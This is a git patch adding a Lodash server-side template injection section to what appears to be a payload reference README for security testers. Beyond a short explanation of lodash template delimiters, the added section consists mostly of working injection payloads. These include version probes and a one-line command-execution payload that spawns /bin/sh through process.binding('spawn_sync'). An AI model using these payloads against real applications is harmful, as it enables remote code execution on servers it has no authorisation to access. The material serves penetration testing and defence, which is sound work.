From 34da0e270835da39b8577f488e1ea3f491053de4 Mon Sep 17 00:00:00 2001
From: 2h0ng <60600792+superboy-zjc@users.noreply.github.com>
Date: Sat, 2 Sep 2023 21:24:59 -0400
Subject: [PATCH] Update Lodash SSTI

Update Lodash SSTI
---
 Server Side Template Injection/README.md | 48 ++++++++++++++++++++++++
 1 file changed, 48 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 66d0219c..36af6926 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -56,6 +56,9 @@
 - [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
 - [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
 - [Plugins](#plugins)
+ - [JavaScript - Lodash](#Lodash)
+ - [Lodash - Basic Injection](#Lodash---Basic-Injection)
+ - [Lodash - Command Execution](#Lodash---Command-Execution)
 - [Python - Mako](#mako)
 - [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
 - [Java - Pebble](#pebble)
@@ -743,6 +746,51 @@ registerPlugin({
 
 ---
 
+## Lodash
+
+[Official website](https://lodash.com/docs/4.17.15)
+
+### Lodash - Basic Injection
+
+How to create a template:
+
+```javascript
+const _ = require('lodash');
+string = "{{= username}}"
+const options = {
+ evaluate: /\{\{(.+?)\}\}/g,
+ interpolate: /\{\{=(.+?)\}\}/g,
+ escape: /\{\{-(.+?)\}\}/g,
+};
+
+_.template(string, options);
+```
+
+- **string:** The template string.
+- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
+- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
+- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
+
+For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
+
+```javascript
+{{= _.VERSION}}
+${= _.VERSION}
+<%= _.VERSION %>
+
+
+{{= _.templateSettings.evaluate }}
+${= _.VERSION}
+<%= _.VERSION %>
+
+```
+
+### Lodash - Command Execution
+
+```
+{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
+```
+
 ## Mako
 
 [Official website](https://www.makotemplates.org/)